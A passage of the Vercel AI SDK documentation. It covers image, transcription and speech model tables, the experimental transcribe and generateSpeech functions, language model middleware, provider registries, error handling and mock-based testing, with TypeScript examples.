| DeepInfra | stabilityai/sd3.5 | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | black-forest-labs/FLUX-1.1-pro | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-schnell | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-dev | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-pro | 256-1440 (multiples of 32) |
| DeepInfra | stabilityai/sd3.5-medium | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | stabilityai/sdxl-turbo | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| Replicate | black-forest-labs/flux-schnell | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Replicate | recraft-ai/recraft-v3 | 1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024 |
| Google Vertex | imagen-3.0-generate-002 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Fireworks | accounts/fireworks/models/flux-1-dev-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/flux-1-schnell-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/playground-v2-5-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/japanese-stable-diffusion-xl | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/playground-v2-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/SSD-1B | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Luma | photon-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Luma | photon-flash-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Together.ai | stabilityai/stable-diffusion-xl-base-1.0 | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev-lora | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-canny | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-depth | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-redux | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell-Free | 512x512, 768x768, 1024x1024 |
Above are a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Transcription description: Learn how to transcribe audio with the AI SDK.
Transcription
Transcription is an experimental feature.
The AI SDK provides the transcribe
function to transcribe audio using a transcription model.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.
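For example, a sketch passing a URL instead of a file buffer (the URL is a placeholder):
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'), // placeholder URL
});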
To access the generated transcript:
const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available
Settings
Provider-Specific settings
Transcription models often have provider or model-specific settings which you can set using the providerOptions parameter.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: {
openai: {
timestampGranularities: ['word'],
},
},
});
Abort Signals and Timeouts
transcribe accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the transcription process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
transcribe accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the transcription request.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
const warnings = transcript.warnings;
Error Handling
When transcribe cannot generate a valid transcript, it throws an AI_NoTranscriptGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the transcription model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_transcribe as transcribe,
NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
try {
await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
} catch (error) {
if (NoTranscriptGeneratedError.isInstance(error)) {
console.log('NoTranscriptGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Transcription Models
| Provider | Model |
|---|---|
| OpenAI | whisper-1 |
| OpenAI | gpt-4o-transcribe |
| OpenAI | gpt-4o-mini-transcribe |
| ElevenLabs | scribe_v1 |
| ElevenLabs | scribe_v1_experimental |
| Groq | whisper-large-v3-turbo |
| Groq | distil-whisper-large-v3-en |
| Groq | whisper-large-v3 |
| Azure OpenAI | whisper-1 |
| Azure OpenAI | gpt-4o-transcribe |
| Azure OpenAI | gpt-4o-mini-transcribe |
| Rev.ai | machine |
| Rev.ai | low_cost |
| Rev.ai | fusion |
| Deepgram | base (+ variants) |
| Deepgram | enhanced (+ variants) |
| Deepgram | nova (+ variants) |
| Deepgram | nova-2 (+ variants) |
| Deepgram | nova-3 (+ variants) |
| Gladia | default |
| AssemblyAI | best |
| AssemblyAI | nano |
| Fal | whisper |
| Fal | wizper |
Above are a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Speech description: Learn how to generate speech from text with the AI SDK.
Speech
Speech is an experimental feature.
The AI SDK provides the generateSpeech
function to generate speech from text using a speech model.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy',
});
To access the generated audio:
const audioData = audio.audioData; // audio data e.g. Uint8Array
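For example, a minimal sketch that writes the audio data to disk (the file name is an arbitrary choice):
import { writeFile } from 'fs/promises';

await writeFile('speech.mp3', audioData); // audioData from the snippet above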
Settings
Provider-Specific settings
You can set model-specific settings with the providerOptions parameter.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
providerOptions: {
openai: {
// ...
},
},
});
Abort Signals and Timeouts
generateSpeech accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the speech generation process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { readFile } from 'fs/promises';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
generateSpeech accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the speech generation request.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { readFile } from 'fs/promises';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { readFile } from 'fs/promises';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
const warnings = audio.warnings;
Error Handling
When generateSpeech cannot generate valid audio, it throws an AI_NoAudioGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the speech model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_generateSpeech as generateSpeech,
AI_NoAudioGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
try {
await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
} catch (error) {
if (AI_NoAudioGeneratedError.isInstance(error)) {
console.log('AI_NoAudioGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Speech Models
| Provider | Model |
|---|---|
| OpenAI | tts-1 |
| OpenAI | tts-1-hd |
| OpenAI | gpt-4o-mini-tts |
| LMNT | aurora |
| LMNT | blizzard |
| Hume | default |
Above are a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models
Language Model Middleware
Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.
It can be used to add features like guardrails, RAG, caching, and logging in a language-model-agnostic way. Such middleware can be developed and distributed independently of the language models it is applied to.
Using Language Model Middleware
You can use language model middleware with the wrapLanguageModel function.
It takes a language model and a language model middleware and returns a new
language model that incorporates the middleware.
import { wrapLanguageModel } from 'ai';
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: yourLanguageModelMiddleware,
});
The wrapped language model can be used just like any other language model, e.g. in streamText:
const result = streamText({
model: wrappedLanguageModel,
prompt: 'What cities are in the United States?',
});
Multiple middlewares
You can provide multiple middlewares to the wrapLanguageModel function.
The middlewares will be applied in the order they are provided.
const wrappedLanguageModel = wrapLanguageModel({
model: yourModel,
middleware: [firstMiddleware, secondMiddleware],
});
// applied as: firstMiddleware(secondMiddleware(yourModel))
Built-in Middleware
The AI SDK comes with several built-in middlewares that you can use to configure language models:
- extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
- simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
- defaultSettingsMiddleware: Applies default settings to a language model.
Extract Reasoning
Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.
The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
The extractReasoningMiddleware function also includes a startWithReasoning option.
When set to true, the reasoning tag will be prepended to the generated text.
This is useful for models that do not include the reasoning tag at the beginning of the response.
For more details, see the DeepSeek R1 guide.
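A sketch using this option (yourModel is the same placeholder as above):
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractReasoningMiddleware({
    tagName: 'think',
    startWithReasoning: true, // treat the response as starting inside the reasoning tag
  }),
});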
Simulate Streaming
The simulateStreamingMiddleware function can be used to simulate streaming behavior with responses from non-streaming language models.
This is useful when you want to maintain a consistent streaming interface even when using models that only provide complete responses.
import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: simulateStreamingMiddleware(),
});
Default Settings
The defaultSettingsMiddleware function can be used to apply default settings to a language model.
import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: defaultSettingsMiddleware({
settings: {
temperature: 0.5,
maxTokens: 800,
// note: use providerMetadata instead of providerOptions here:
providerMetadata: { openai: { store: false } },
},
}),
});
Implementing Language Model Middleware
You can implement any of the following three functions to modify the behavior of the language model:
- `transformParams`: Transforms the parameters before they are passed to the language model, for both `doGenerate` and `doStream`.
- `wrapGenerate`: Wraps the `doGenerate` method of the language model. You can modify the parameters, call the language model, and modify the result.
- `wrapStream`: Wraps the `doStream` method of the language model. You can modify the parameters, call the language model, and modify the result.
Here are some examples of how to implement language model middleware:
Examples
Logging
This example shows how to log the parameters and generated text of a language model call.
import type { LanguageModelV1Middleware, LanguageModelV1StreamPart } from 'ai';
export const yourLogMiddleware: LanguageModelV1Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('doGenerate called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const result = await doGenerate();
console.log('doGenerate finished');
console.log(`generated text: ${result.text}`);
return result;
},
wrapStream: async ({ doStream, params }) => {
console.log('doStream called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const { stream, ...rest } = await doStream();
let generatedText = '';
const transformStream = new TransformStream<
LanguageModelV1StreamPart,
LanguageModelV1StreamPart
>({
transform(chunk, controller) {
if (chunk.type === 'text-delta') {
generatedText += chunk.textDelta;
}
controller.enqueue(chunk);
},
flush() {
console.log('doStream finished');
console.log(`generated text: ${generatedText}`);
},
});
return {
stream: stream.pipeThrough(transformStream),
...rest,
};
},
};
Caching
This example shows how to build a simple cache for the generated text of a language model call.
import type { LanguageModelV1Middleware } from 'ai';
const cache = new Map<string, any>();
export const yourCacheMiddleware: LanguageModelV1Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
const cacheKey = JSON.stringify(params);
if (cache.has(cacheKey)) {
return cache.get(cacheKey);
}
const result = await doGenerate();
cache.set(cacheKey, result);
return result;
},
// here you would implement the caching logic for streaming
};
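For streaming, one possible approach (a sketch, not a complete solution) is to record the stream parts as they pass through and replay them with the AI SDK's simulateReadableStream helper on a cache hit:
import { simulateReadableStream } from 'ai';
import type { LanguageModelV1Middleware, LanguageModelV1StreamPart } from 'ai';
const streamCache = new Map<string, { parts: LanguageModelV1StreamPart[]; rest: any }>();
export const yourStreamCachingMiddleware: LanguageModelV1Middleware = {
wrapStream: async ({ doStream, params }) => {
const cacheKey = JSON.stringify(params);
// cache hit: replay the recorded stream parts
const cached = streamCache.get(cacheKey);
if (cached != null) {
return {
...cached.rest,
stream: simulateReadableStream({ chunks: cached.parts }),
};
}
// cache miss: record the parts while forwarding them to the caller
const { stream, ...rest } = await doStream();
const parts: LanguageModelV1StreamPart[] = [];
const recorder = new TransformStream<
LanguageModelV1StreamPart,
LanguageModelV1StreamPart
>({
transform(chunk, controller) {
parts.push(chunk);
controller.enqueue(chunk);
},
flush() {
streamCache.set(cacheKey, { parts, rest });
},
});
return { stream: stream.pipeThrough(recorder), ...rest };
},
};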
Retrieval Augmented Generation (RAG)
This example shows how to use RAG as middleware.
import type { LanguageModelV1Middleware } from 'ai';
export const yourRagMiddleware: LanguageModelV1Middleware = {
transformParams: async ({ params }) => {
const lastUserMessageText = getLastUserMessageText({
prompt: params.prompt,
});
if (lastUserMessageText == null) {
return params; // do not use RAG (send unmodified parameters)
}
const instruction =
'Use the following information to answer the question:\n' +
findSources({ text: lastUserMessageText })
.map(chunk => JSON.stringify(chunk))
.join('\n');
return addToLastUserMessage({ params, text: instruction });
},
};
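The helpers used above (getLastUserMessageText, findSources, addToLastUserMessage) are application-specific and not part of the AI SDK. As an illustration, here is a minimal sketch of the first one, assuming the LanguageModelV1 prompt format:
import type { LanguageModelV1Prompt } from '@ai-sdk/provider';
// hypothetical helper: extract the text of the last user message, if any
function getLastUserMessageText({
prompt,
}: {
prompt: LanguageModelV1Prompt;
}): string | undefined {
const lastMessage = prompt.at(-1);
if (lastMessage?.role !== 'user') return undefined;
return lastMessage.content
.map(part => (part.type === 'text' ? part.text : ''))
.join('');
}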
Guardrails
Guardrails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.
import type { LanguageModelV1Middleware } from 'ai';
export const yourGuardrailMiddleware: LanguageModelV1Middleware = {
wrapGenerate: async ({ doGenerate }) => {
const { text, ...rest } = await doGenerate();
// filtering approach, e.g. for PII or other sensitive information:
const cleanedText = text?.replace(/badword/g, '<REDACTED>');
return { text: cleanedText, ...rest };
},
// here you would implement the guardrail logic for streaming
// Note: streaming guardrails are difficult to implement, because
// you do not know the full content of the stream until it's finished.
};
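For illustration, here is a naive streaming variant (a sketch; per-chunk filtering misses matches that span chunk boundaries, which is why buffering strategies are usually needed):
import type { LanguageModelV1Middleware, LanguageModelV1StreamPart } from 'ai';
export const yourStreamingGuardrailMiddleware: LanguageModelV1Middleware = {
wrapStream: async ({ doStream }) => {
const { stream, ...rest } = await doStream();
const filter = new TransformStream<
LanguageModelV1StreamPart,
LanguageModelV1StreamPart
>({
transform(chunk, controller) {
if (chunk.type === 'text-delta') {
// naive: a match split across two chunks is not redacted
controller.enqueue({
...chunk,
textDelta: chunk.textDelta.replace(/badword/g, '<REDACTED>'),
});
} else {
controller.enqueue(chunk);
}
},
});
return { stream: stream.pipeThrough(filter), ...rest };
},
};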
Configuring Per Request Custom Metadata
To send and access custom metadata in Middleware, you can use providerOptions. This is useful when building logging middleware where you want to pass additional context like user IDs, timestamps, or other contextual data that can help with tracking and debugging.
import { openai } from '@ai-sdk/openai';
import { generateText, wrapLanguageModel, LanguageModelV1Middleware } from 'ai';
export const yourLogMiddleware: LanguageModelV1Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
const result = await doGenerate();
return result;
},
};
const { text } = await generateText({
model: wrapLanguageModel({
model: openai('gpt-4o'),
middleware: yourLogMiddleware,
}),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
yourLogMiddleware: {
hello: 'world',
},
},
});
console.log(text);
title: Provider & Model Management description: Learn how to work with multiple providers and models
Provider & Model Management
When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.
The AI SDK offers custom providers and a provider registry for this purpose:
- With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
- The provider registry lets you mix multiple providers and access them through simple string ids.
You can mix and match custom providers, the provider registry, and middleware in your application.
Custom Providers
You can create a custom provider using customProvider.
Example: custom model settings
You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.
import { openai as originalOpenAI } from '@ai-sdk/openai';
import { customProvider } from 'ai';
// custom provider with different model settings:
export const openai = customProvider({
languageModels: {
// replacement model with custom settings:
'gpt-4o': originalOpenAI('gpt-4o', { structuredOutputs: true }),
// alias model with custom settings:
'gpt-4o-mini-structured': originalOpenAI('gpt-4o-mini', {
structuredOutputs: true,
}),
},
fallbackProvider: originalOpenAI,
});
Example: model name alias
You can also provide model name aliases, so you can update the model version in one place in the future:
import { anthropic as originalAnthropic } from '@ai-sdk/anthropic';
import { customProvider } from 'ai';
// custom provider with alias names:
export const anthropic = customProvider({
languageModels: {
opus: originalAnthropic('claude-3-opus-20240229'),
sonnet: originalAnthropic('claude-3-5-sonnet-20240620'),
haiku: originalAnthropic('claude-3-haiku-20240307'),
},
fallbackProvider: originalAnthropic,
});
Example: limit available models
You can limit the available models in the system, even if you have multiple providers.
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { customProvider } from 'ai';
export const myProvider = customProvider({
languageModels: {
'text-medium': anthropic('claude-3-5-sonnet-20240620'),
'text-small': openai('gpt-4o-mini'),
'structure-medium': openai('gpt-4o', { structuredOutputs: true }),
'structure-fast': openai('gpt-4o-mini', { structuredOutputs: true }),
},
embeddingModels: {
embedding: openai.textEmbeddingModel('text-embedding-3-small'),
},
// no fallback provider
});
Provider Registry
You can create a provider registry with multiple providers and models using createProviderRegistry.
Setup
import { anthropic } from '@ai-sdk/anthropic';
import { createOpenAI } from '@ai-sdk/openai';
import { createProviderRegistry } from 'ai';
export const registry = createProviderRegistry({
// register provider with prefix and default setup:
anthropic,
// register provider with prefix and custom setup:
openai: createOpenAI({
apiKey: process.env.OPENAI_API_KEY,
}),
});
Setup with Custom Separator
By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry } from 'ai';
export const customSeparatorRegistry = createProviderRegistry(
{
anthropic,
openai,
},
{ separator: ' > ' },
);
Example: Use language models
You can access language models by using the languageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { generateText } from 'ai';
import { registry } from './registry';
const { text } = await generateText({
model: registry.languageModel('openai:gpt-4-turbo'), // default separator
// or with custom separator:
// model: customSeparatorRegistry.languageModel('openai > gpt-4-turbo'),
prompt: 'Invent a new holiday and describe its traditions.',
});
Example: Use text embedding models
You can access text embedding models by using the textEmbeddingModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { embed } from 'ai';
import { registry } from './registry';
const { embedding } = await embed({
model: registry.textEmbeddingModel('openai:text-embedding-3-small'),
value: 'sunny day at the beach',
});
Example: Use image models
You can access image models by using the imageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { experimental_generateImage as generateImage } from 'ai';
import { registry } from './registry';
const { image } = await generateImage({
model: registry.imageModel('openai:dall-e-3'),
prompt: 'A beautiful sunset over a calm ocean',
});
Combining Custom Providers, Provider Registry, and Middleware
The central idea of provider management is to set up a file that contains all the providers and models you want to use. You may want to pre-configure model settings, provide model name aliases, limit the available models, and more.
Here is an example that implements the following concepts:
- pass through a full provider with a namespace prefix (here: `xai > *`)
- setup an OpenAI-compatible provider with custom api key and base URL (here: `custom > *`)
- setup model name aliases (here: `anthropic > fast`, `anthropic > writing`, `anthropic > reasoning`)
- pre-configure model settings (here: `anthropic > reasoning`)
- validate the provider-specific options (here: `AnthropicProviderOptions`)
- use a fallback provider (here: `anthropic > *`)
- limit a provider to certain models without a fallback (here: `groq > gemma2-9b-it`, `groq > qwen-qwq-32b`)
- define a custom separator for the provider registry (here: `>`)
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
createProviderRegistry,
customProvider,
defaultSettingsMiddleware,
wrapLanguageModel,
} from 'ai';
export const registry = createProviderRegistry(
{
// pass through a full provider with a namespace prefix
xai,
// access an OpenAI-compatible provider with custom setup
custom: createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.CUSTOM_API_KEY,
baseURL: 'https://api.custom.com/v1',
}),
// setup model name aliases
anthropic: customProvider({
languageModels: {
fast: anthropic('claude-3-haiku-20240307'),
// simple model
writing: anthropic('claude-3-7-sonnet-20250219'),
// extended reasoning model configuration:
reasoning: wrapLanguageModel({
model: anthropic('claude-3-7-sonnet-20250219'),
middleware: defaultSettingsMiddleware({
settings: {
maxTokens: 100000, // example default setting
providerMetadata: {
anthropic: {
thinking: {
type: 'enabled',
budgetTokens: 32000,
},
} satisfies AnthropicProviderOptions,
},
},
}),
}),
},
fallbackProvider: anthropic,
}),
// limit a provider to certain models without a fallback
groq: customProvider({
languageModels: {
'gemma2-9b-it': groq('gemma2-9b-it'),
'qwen-qwq-32b': groq('qwen-qwq-32b'),
},
}),
},
{ separator: ' > ' },
);
// usage:
const model = registry.languageModel('anthropic > reasoning');
title: Error Handling description: Learn how to handle errors in the AI SDK Core
Error Handling
Handling regular errors
Regular errors are thrown and can be handled using the try/catch block.
import { generateText } from 'ai';
try {
const { text } = await generateText({
model: yourModel,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
} catch (error) {
// handle error
}
See Error Types for more information on the different types of errors that may be thrown.
Handling streaming errors (simple streams)
When errors occur during streams that do not support error chunks,
the error is thrown as a regular error.
You can handle these errors using the try/catch block.
import { streamText } from 'ai';
try {
const { textStream } = streamText({
model: yourModel,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
} catch (error) {
// handle error
}
Handling streaming errors (streaming with error support)
Full streams support error parts. You can handle those parts similar to other parts. It is recommended to also add a try-catch block for errors that happen outside of the streaming.
import { streamText } from 'ai';
try {
const { fullStream } = streamText({
model: yourModel,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const part of fullStream) {
switch (part.type) {
// ... handle other part types
case 'error': {
const error = part.error;
// handle error
break;
}
}
}
} catch (error) {
// handle error
}
title: Testing description: Learn how to use AI SDK Core mock providers for testing.
Testing
Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.
To enable you to unit test your code that uses the AI SDK, the AI SDK Core
includes mock providers and test helpers. You can import the following helpers from ai/test:
- `MockEmbeddingModelV1`: A mock embedding model using the embedding model v1 specification.
- `MockLanguageModelV1`: A mock language model using the language model v1 specification.
- `mockId`: Provides an incrementing integer ID.
- `mockValues`: Iterates over an array of values with each call. Returns the last value when the array is exhausted.
- `simulateReadableStream`: Simulates a readable stream with delays.
With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.
Examples
You can use the test helpers with the AI Core functions in your unit tests:
generateText
import { generateText } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';
const result = await generateText({
model: new MockLanguageModelV1({
doGenerate: async () => ({
rawCall: { rawPrompt: null, rawSettings: {} },
finishReason: 'stop',
usage: { promptTokens: 10, completionTokens: 20 },
text: `Hello, world!`,
}),
}),
prompt: 'Hello, test!',
});
streamText
import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';
const result = streamText({
model: new MockLanguageModelV1({
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-delta', textDelta: 'Hello' },
{ type: 'text-delta', textDelta: ', ' },
{ type: 'text-delta', textDelta: `world!` },
{
type: 'finish',
finishReason: 'stop',
logprobs: undefined,
usage: { completionTokens: 10, promptTokens: 3 },
},
],
}),
rawCall: { rawPrompt: null, rawSettings: {} },
}),
}),
prompt: 'Hello, test!',
});
generateObject
import { generateObject } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';
import { z } from 'zod';
const result = await generateObject({
model: new MockLanguageModelV1({
defaultObjectGenerationMode: 'json',
doGenerate: async () => ({
rawCall: { rawPrompt: null, rawSettings: {} },
finishReason: 'stop',
usage: { promptTokens: 10, completionTokens: 20 },
text: `{"content":"Hello, world!"}`,
}),
}),
schema: z.object({ content: z.string() }),
prompt: 'Hello, test!',
});
streamObject
import { streamObject, simulateReadableStream } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';
import { z } from 'zod';
const result = streamObject({
model: new MockLanguageModelV1({
defaultObjectGenerationMode: 'json',
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-delta', textDelta: '{ ' },
{ type: 'text-delta', textDelta: '"content": ' },
{ type: 'text-delta', textDelta: `"Hello, ` },
{ type: 'text-delta', textDelta: `world` },
{ type: 'text-delta', textDelta: `!"` },
{ type: 'text-delta', textDelta: ' }' },
{
type: 'finish',
finishReason: 'stop',
logprobs: undefined,
usage: { completionTokens: 10, promptTokens: 3 },
},
],
}),
rawCall: { rawPrompt: null, rawSettings: {} },
}),
}),
schema: z.object({ content: z.string() }),
prompt: 'Hello, test!',
});
Simulate Data Stream Protocol Responses
You can also simulate Data Stream Protocol responses for testing, debugging, or demonstration purposes.
Here is a Next.js example:
import { simulateReadableStream } from 'ai';
export async function POST(req: Request) {
return new Response(
simulateReadableStream({
initialDelayInMs: 1000, // Delay before the first chunk
chunkDelayInMs: 300, // Delay between chunks
chunks: [
`0:"This"\n`,
`0:" is an"\n`,
`0:"example."\n`,
`e:{"finishReason":"stop","usage":{"promptTokens":20,"completionTokens":50},"isContinued":false}\n`,
`d:{"finishReason":"stop","usage":{"promptTokens":20,"completionTokens":50}}\n`,
],
}).pipeThrough(new TextEncoderStream()),
{
status: 200,
headers: {
'X-Vercel-AI-Data-Stream': 'v1',
'Content-Type': 'text/plain; charset=utf-8',
},
},
);
}
title: Telemetry description: Using OpenTelemetry with AI SDK Core
Telemetry
The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.
Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.
Enabling telemetry
